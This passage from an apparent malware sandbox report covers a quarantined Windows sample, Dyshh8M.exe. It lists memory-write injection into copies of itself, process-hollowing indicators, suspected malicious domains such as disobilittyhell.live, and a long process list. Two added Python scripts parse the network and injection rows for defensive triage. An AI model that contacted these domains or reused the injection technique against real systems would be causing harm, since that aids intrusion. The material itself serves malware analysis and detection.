US 150.171.27.10:443 tse1.mm.bing.net tcp
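
The table above mixes three kinds of rows: lookups sent to the resolver at 8.8.8.8:53, connections to the hosts those names resolved to, and background traffic of the analysis VM (the bing.com/mm.bing.net fetches also appear in the sample-free Edge run earlier on this page). The script below, an added example rather than part of the report, separates them for a subset of rows copied from this table plus the multicast row from the Edge section: domains that were looked up and then contacted on 443, domains that were only looked up (no connection followed, which is consistent with NXDOMAIN or a refused connect; the table logs no DNS answers, so it cannot tell the two apart), and local multicast chatter. The resolver address and the benign-suffix list are assumptions read off this report, and the allowlist is deliberately limited to the VM's own traffic so that legitimate but unexpected destinations such as steamcommunity.com stay visible.

```python
import ipaddress
from collections import defaultdict

# A subset of rows copied from the table above, plus the multicast row from the Edge
# section earlier on this page (the one row that has no Domain column).
NETWORK_TABLE = """\
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.112.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
N/A 224.0.0.251:5353 udp
"""

# Assumption: the VM's recursive resolver. Every udp/53 row in this report goes there,
# so those rows are lookups of the Domain column, not contact with the resolved host.
RESOLVER = "8.8.8.8"
# Assumption: background traffic of the analysis VM, taken from the sample-free Edge run
# earlier on this page. Kept deliberately short so unexpected legitimate sites stay visible.
BENIGN_SUFFIXES = ("bing.com", "bing.net")


def parse_rows(text):
    """Yield (country, host, port, domain, proto); Domain may be absent or 'N/A'."""
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:                  # row with no Domain column
            country, dest, proto = parts
            domain = None
        else:
            raise ValueError(f"unexpected row: {line!r}")
        if domain == "N/A":
            domain = None
        host, _, port = dest.rpartition(":")
        yield country, host, int(port), domain, proto


def is_benign(name):
    return any(name == s or name.endswith("." + s) for s in BENIGN_SUFFIXES)


def summarize(text):
    """Per domain: how often it was looked up and which (ip, port, proto) were then contacted."""
    domains = defaultdict(lambda: {"lookups": 0, "connections": set()})
    noise = set()
    for _country, host, port, domain, proto in parse_rows(text):
        addr = ipaddress.ip_address(host)
        if addr.is_multicast or addr.is_private or addr.is_link_local:
            noise.add(host)                    # mDNS / LAN chatter, not the sample's servers
            continue
        key = domain or host                   # a connection with no name is still listed
        if is_benign(key):
            continue
        if host == RESOLVER and port == 53 and proto == "udp":
            domains[key]["lookups"] += 1
        else:
            domains[key]["connections"].add((host, port, proto))
    summary = {d: {"lookups": v["lookups"], "connections": sorted(v["connections"])}
               for d, v in domains.items()}
    return summary, sorted(noise)


def ioc_candidates(summary):
    """Split into domains that were contacted after lookup and domains only ever looked up."""
    live = sorted(d for d, v in summary.items() if v["connections"])
    dns_only = sorted(d for d, v in summary.items() if not v["connections"])
    return live, dns_only


if __name__ == "__main__":
    summary, noise = summarize(NETWORK_TABLE)
    live, dns_only = ioc_candidates(summary)
    for d in live:
        print(f"{d}: {summary[d]['connections']}")
    print("looked up only:", dns_only)
    print("local noise:", noise)
```

Two of the live domains resolve to Cloudflare-range addresses shared by many tenants, so the domain, not the IP, is the indicator to block; the DNS-only names are still worth a watchlist entry, since a name the sample tries but cannot reach today may be registered tomorrow.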

Files

memory/4500-0-0x0000000074D7E000-0x0000000074D7F000-memory.dmp

memory/4500-1-0x0000000000DE0000-0x0000000000E48000-memory.dmp

memory/4500-2-0x0000000005CC0000-0x0000000006264000-memory.dmp

memory/4876-4-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4876-6-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4500-7-0x0000000074D70000-0x0000000075520000-memory.dmp

memory/4876-8-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4876-9-0x0000000000400000-0x000000000045E000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

100s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Signatures

Program crash

Description | Indicator | Process | Target
N/A | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

System Location Discovery: System Language Discovery

discovery

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1232 wrote to memory of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3484 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3484 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3484 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2792 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2792 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2792 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2472 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2472 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2472 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3352 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3352 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3352 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4076 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4076 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4076 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 640 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 640 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 640 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2052 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4452 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4452 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4452 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3716 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3716 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3716 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 392 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 392 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 392 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4360 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4360 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4360 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4484 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4484 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4484 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4348 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
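
The SetThreadContext row in behavioral4 and the WriteProcessMemory rows above record the same shape of event: a quarantine sample spawns a second copy of its own image and writes into it. In behavioral4 the injector (PID 4500) also replaces the child's thread context and then faults (both WerFault.exe lines in its process list carry -p 4500); in behavioral6 the parent (PID 1232) writes three times into each of more than twenty children, and the table stops after 64 rows part-way through the last target. Writing into a freshly spawned copy of the same executable and then calling SetThreadContext is consistent with process hollowing, but the sandbox rows record only the writes and the context change, not the suspended creation or the resume, so the memory dumps listed for PID 4876 (0x400000 to 0x45E000) are where the analyst confirms what was written. The script below, an added example and not the sandbox's own logic, correlates rows copied from both tables into per-pair write counts, fan-out per injector, and crash attribution. The sandbox separates the four columns with spaces; ' | ' is inserted into the copied rows here, as an assumption of this parser, so that image paths containing spaces cannot be mis-split.

```python
import re
from collections import defaultdict

# Rows copied from the signature tables: behavioral4's single SetThreadContext row and the
# first nine WriteProcessMemory rows of behavioral6. The sandbox separates the four columns
# with spaces; ' | ' is inserted here (an assumption of this parser) so that image paths
# containing spaces cannot be mis-split.
SIGNATURE_ROWS = r"""
PID 4500 set thread context of 4876 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
PID 1232 wrote to memory of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2916 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"""

# WerFault command lines copied from behavioral4's process list; '-p <pid>' names the
# process that faulted (4500, the injector).
WERFAULT_CMDLINES = [
    r"C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4500 -ip 4500",
    r"C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 776",
]

ROW_RE = re.compile(r"^PID (\d+) (set thread context of|wrote to memory of) (\d+)$")
ACTIONS = {"set thread context of": "context", "wrote to memory of": "write"}


def parse_signature_rows(text):
    """One event per row: action, source PID, target PID and both image paths."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cols = [c.strip() for c in line.split(" | ")]
        if len(cols) != 4:
            raise ValueError(f"expected 4 columns: {line!r}")
        m = ROW_RE.match(cols[0])
        if not m:
            raise ValueError(f"unrecognised description: {cols[0]!r}")
        src, verb, dst = m.groups()
        events.append({"action": ACTIONS[verb], "src": int(src), "dst": int(dst),
                       "src_image": cols[2], "dst_image": cols[3]})
    return events


def crashed_pids(cmdlines):
    """PIDs that WerFault was started for ('-p <pid>')."""
    pids = set()
    for cmd in cmdlines:
        m = re.search(r"\s-p (\d+)", cmd)
        if m:
            pids.add(int(m.group(1)))
    return pids


def correlate(events, werfault_cmdlines=()):
    """Per (injector, target): write count, whether the thread context was replaced, and
    whether the target runs the injector's own image; plus fan-out and crash attribution."""
    injections = {}
    for e in events:
        rec = injections.setdefault((e["src"], e["dst"]), {
            "writes": 0, "context_set": False,
            "same_image": e["src_image"].lower() == e["dst_image"].lower()})
        if e["action"] == "write":
            rec["writes"] += 1
        else:
            rec["context_set"] = True
    fan_out = defaultdict(set)
    for src, dst in injections:
        fan_out[src].add(dst)
    crashed = crashed_pids(werfault_cmdlines)
    findings = []
    for (src, dst), rec in sorted(injections.items()):
        parts = [f"{src} -> {dst}: {rec['writes']} write(s)"]
        if rec["same_image"]:
            parts.append("target is a fresh copy of the injector's own image")
        if rec["context_set"]:
            parts.append("thread context replaced")   # write + SetThreadContext: hollowing-style
        if src in crashed:
            parts.append("injector later faulted (WerFault)")
        findings.append("; ".join(parts))
    return {"injections": injections, "fan_out": {s: len(t) for s, t in fan_out.items()},
            "crashed": crashed, "findings": findings}


if __name__ == "__main__":
    for line in correlate(parse_signature_rows(SIGNATURE_ROWS), WERFAULT_CMDLINES)["findings"]:
        print(line)
```

The fan-out figure is the discriminator between the two runs: one child with its context replaced (behavioral4) reads as hollowing, while a parent that writes into dozens of short-lived copies of itself and a "Program crash" signature (behavioral6) reads as a payload that keeps failing and being relaunched, which is why the process list for that run is so long.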

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

